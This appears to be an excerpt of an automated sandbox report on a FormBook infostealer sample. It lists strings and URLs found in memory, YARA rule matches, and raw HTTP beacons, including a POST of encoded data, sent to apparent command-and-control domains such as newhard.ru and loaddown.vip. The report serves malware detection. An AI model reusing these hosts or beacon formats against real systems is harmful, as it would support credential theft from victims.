                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                Source: rundll32.exe, 00000007.00000002.832378207.0000000004C58000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://newhard.ru/p6a2/?PJsOe=T7Oc7Ddw1O0v8xiwxjGjB92YwMYIGm5zgL68zmFX3c2O6eqvx6hztOx3eHSliQXWKuFqXf
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ogp.me/ns#
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: rundll32.exe, 00000007.00000002.829692359.00000000002E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.829059777.0000000000271000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hiufouwnwk.shop/p6a2/?4u=XXw8ZRfd0&PJsOe=ZgRZpMDYqcRIPQpAVsyf63QGrqbxGqVGJ2Bchc7mGSCh2JTc
                Source: rundll32.exe, 00000007.00000002.832796956.0000000005A7A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
                Source: 586G6N9V9.7.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: 586G6N9V9.7.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/1.5.15/clipboard.min.js?v=1.5.15
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery.devbridge-autocomplete/1.4.10/jquery.autocomplete.min.
                Source: rundll32.exe, 00000007.00000002.833226570.0000000006CA0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.832523353.000000000510E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js
                Source: rundll32.exe, 00000007.00000002.833226570.0000000006CA0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.832523353.000000000510E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://domaincntrol.com/?orighost=
                Source: 586G6N9V9.7.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: rundll32.exe, 00000007.00000003.530109049.0000000006F46000.00000004.00000800.00020000.00000000.sdmp, 586G6N9V9.7.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: 586G6N9V9.7.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: rundll32.exe, 00000007.00000002.832245257.0000000004AC6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://realtxt.co.uk
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://realtxt.co.uk/blog
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://realtxt.co.uk/contact
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://realtxt.co.uk/page/terms
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://realtxt.co.uk/pricing
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://realtxt.co.uk/report
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://realtxt.co.uk/static/application.fn.js
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://realtxt.co.uk/static/application.js
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://realtxt.co.uk/static/bootstrap.min.js
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://realtxt.co.uk/static/css/bootstrap.min.css
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://realtxt.co.uk/static/css/components.min.css
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://realtxt.co.uk/static/css/fa-all.min.css
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://realtxt.co.uk/static/js/jquery.min.js
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://realtxt.co.uk/static/server.js
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://realtxt.co.uk/themes/cleanex/assets/js/main.js
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://realtxt.co.uk/themes/cleanex/style.css
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://realtxt.co.uk/user/login
                Source: rundll32.exe, 00000007.00000002.832907852.0000000005D9E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://realtxt.co.uk/user/register
                Source: rundll32.exe, 00000007.00000003.530109049.0000000006F46000.00000004.00000800.00020000.00000000.sdmp, 586G6N9V9.7.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                Source: rundll32.exe, 00000007.00000003.530109049.0000000006F46000.00000004.00000800.00020000.00000000.sdmp, 586G6N9V9.7.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                Source: rundll32.exe, 00000007.00000003.530109049.0000000006F46000.00000004.00000800.00020000.00000000.sdmp, 586G6N9V9.7.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                Source: rundll32.exe, 00000007.00000003.530109049.0000000006F46000.00000004.00000800.00020000.00000000.sdmp, 586G6N9V9.7.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                Source: rundll32.exe, 00000007.00000003.530109049.0000000006F46000.00000004.00000800.00020000.00000000.sdmp, 586G6N9V9.7.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: rundll32.exe, 00000007.00000002.832450972.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.loaddown.vip/p6a2/?4u=XXw8ZRfd0&PJsOe=o0oMI
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.392159884.0000000004508000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.390068915.0000000003450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                Source: unknownHTTP traffic detected: POST /p6a2/ HTTP/1.1Host: www.newhard.ruConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.newhard.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.newhard.ru/p6a2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 50 4a 73 4f 65 3d 65 35 6d 38 34 30 68 58 37 39 52 65 28 6d 43 31 69 43 4b 78 4e 76 4b 61 31 63 64 70 52 6b 49 71 68 36 53 4f 39 31 35 50 77 70 47 4f 36 73 7e 39 68 4e 5a 55 6c 4b 35 38 54 67 6d 79 7a 77 48 57 4c 4f 4e 76 63 76 45 6f 7a 46 59 79 6d 63 77 6f 43 46 50 34 52 56 32 73 31 57 4c 52 39 43 7e 6a 7e 4f 31 32 32 65 48 65 6a 4d 68 4d 68 42 64 42 4b 47 70 74 7a 53 58 4d 7a 64 63 6e 32 6d 53 4a 45 52 33 63 6d 63 53 61 6d 4a 55 33 28 63 41 45 4f 44 79 4f 48 53 44 5a 4e 38 4f 39 71 36 73 31 6d 71 73 57 73 4a 79 4b 31 6a 45 62 6c 77 36 6b 48 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: PJsOe=e5m840hX79Re(mC1iCKxNvKa1cdpRkIqh6SO915PwpGO6s~9hNZUlK58TgmyzwHWLONvcvEozFYymcwoCFP4RV2s1WLR9C~j~O122eHejMhMhBdBKGptzSXMzdcn2mSJER3cmcSamJU3(cAEODyOHSDZN8O9q6s1mqsWsJyK1jEblw6kHQ).
                Source: unknownDNS traffic detected: queries for: www.adelaidesociety.com
                Source: global trafficHTTP traffic detected: GET /p6a2/?4u=XXw8ZRfd0&PJsOe=pjY5HSUHAkIjJTnjTuXZqIQD+upstRzJTGdDpMtHb2G7EDTOYPy+SC0sAwePybO7Bg4lDq58C8rolUandfOM6VH00Jlr+bNPuQ== HTTP/1.1Host: www.adelaidesociety.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?PJsOe=T7Oc7Ddw1O0v8xiwxjGjB92YwMYIGm5zgL68zmFX3c2O6eqvx6hztOx3eHSliQXWKuFqXfEa/HBDnsFpMkr8eF2T22317iGL4Q==&4u=XXw8ZRfd0 HTTP/1.1Host: www.newhard.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?4u=XXw8ZRfd0&PJsOe=o0oMI+STs16Mw38KQSkvmmC4P0sg0o0mDw904OgUvxPlTLKfXC9NdymWUu8a4Kbhpw71hSKOgFJzukOjlHXbsoCiidHLGDEsuA== HTTP/1.1Host: www.loaddown.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?PJsOe=eJZ19xYC8GRyuRPgB3K3hYHN997ZzA7xE9BAJMP39dttW2h4vf6lg00rKUwCf45owTZaCQIOMq2NpT3yCXeggU/kVHtPphUyBg==&4u=XXw8ZRfd0 HTTP/1.1Host: www.scastive.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?4u=XXw8ZRfd0&PJsOe=LKTpzSYaad7RY09JlOwiwWKJMKTbKDNtKtFdzgs46VqeU13weoYdOe5FHZNBqvs7M9aWsXvPLdZvpHBZqtvQwjuXQVIPrJpS5Q== HTTP/1.1Host: www.dubmoviedaaa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?PJsOe=xeOhXlH059OOkCPPeiyznifX6DCn6GLjVIPb0HMEaj6kEld1NZvpN20tPmlU3A5oPB4rwbGiD40G1zaemtArGBjdZepieKoLuQ==&4u=XXw8ZRfd0 HTTP/1.1Host: www.elite-travel-cn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?4u=XXw8ZRfd0&PJsOe=qpkXmqYajFP/MwMsH85/xAR+HuOV3BhXfepUxIkOb3Nti8d1pwDCNiT47pq1pm9vxSngzgxeICaYyJ2YpLhtuPpEAFm4f33eOg== HTTP/1.1Host: www.cobramierer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?PJsOe=tRwStDBOqpxrJTuJxG0qdx4zeeLq0lB6PIjn8XuQC4/eCDjBGzFZ7gNi69QxogIVbIfegutMJNyvrWeKAaI2x4/UCc3VFVMIlw==&4u=XXw8ZRfd0 HTTP/1.1Host: www.byfuture.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?4u=XXw8ZRfd0&PJsOe=KR55po+9d10KX8Xj90KZyobZiDa/RtTgSn49Skh//ClUMGayigisS5MQTeINbAsCVfjq5Ep4Iv+TWpG/o+Gu0gk7nNTNW0LRWQ== HTTP/1.1Host: www.forumhtc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?PJsOe=ZZiBudAdKkOjfCQP3JltneA7CA4H+oDcc2F0cF2NCUrgNT/O3PII+zj7tY9WUUQehw4FhZlrF4CxwEcOrzTPe++T19aYNqzGtA==&4u=XXw8ZRfd0 HTTP/1.1Host: www.3658622bet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?4u=XXw8ZRfd0&PJsOe=guYE1BSZ9235N2CnAWofHh5ttYffxi6Or7I/zjjksNN0K1CgBVtEgiG+Hh20F/wLWeO5bKswCo7tklXGWOtZJphg6sBhJOhSXw== HTTP/1.1Host: www.bip39chain.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?4u=XXw8ZRfd0&PJsOe=dUX/NCfS/ohFC7O80P17jduoKXecdoXu/c+jqkCFku2HIELrCmlysUdsWMmXDmnAL0wy8gVH6BIzEQuoLfScbNDGrSU7SZcpQA== HTTP/1.1Host: www.realtxt.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?PJsOe=v0jYY1ytl5PH6OIBhUa985ktrnV9EUxQvf0paGzXVH/pO6il62dTlsncR7GNVbW/vhBZVRhGCtJzQ8DjGp6vLGYCApLjgmmFaA==&4u=XXw8ZRfd0 HTTP/1.1Host: www.4tx.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?PJsOe=/9zhY/Qa6PbuzUJJeFENEisDBASeGLQuA2DsbQL1c4XMJeUN1UEfvc0JnTkLGaGl6hcCibpmZrBf1fZuQl6EVbtQGhHUTPfVDw==&4u=XXw8ZRfd0 HTTP/1.1Host: www.glb-mobility.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?4u=XXw8ZRfd0&PJsOe=pjY5HSUHAkIjJTnjTuXZqIQD+upstRzJTGdDpMtHb2G7EDTOYPy+SC0sAwePybO7Bg4lDq58C8rolUandfOM6VH00Jlr+bNPuQ== HTTP/1.1Host: www.adelaidesociety.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: GET /p6a2/?PJsOe=T7Oc7Ddw1O0v8xiwxjGjB92YwMYIGm5zgL68zmFX3c2O6eqvx6hztOx3eHSliQXWKuFqXfEa/HBDnsFpMkr8eF2T22317iGL4Q==&4u=XXw8ZRfd0 HTTP/1.1Host: www.newhard.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, 00000000.00000002.387303742.000000000151B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 00000007.00000002.830381361.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.830332751.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 00000004.00000000.470848798.000000000C907000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000004.00000000.470848798.000000000C907000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000007.00000002.830381361.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.830381361.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000004.00000000.449196395.000000000C907000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000004.00000000.449196395.000000000C907000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000003.00000002.485479676.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000007.00000002.830332751.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.830332751.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000003.00000002.485989936.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                .NET source code contains very large array initializations
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe, WindowsFormsApp86/Lfoji.csLarge array initialization: GetBuffer: array initializer size 730624
                Source: cloud.exe.0.dr, WindowsFormsApp86/Lfoji.csLarge array initialization: GetBuffer: array initializer size 730624
                Source: 0.0.SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exe.d40000.0.unpack, WindowsFormsApp86/Lfoji.csLarge array initialization: GetBuffer: array initializer size 730624
                Source: SecuriteInfo.com.W32.MSIL_Kryptik.GLW.gen.Eldorado.24241.10847.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000004.00000000.470848798.000000000C907000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000004.00000000.470848798.000000000C907000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000007.00000002.830381361.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000007.00000002.830381361.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
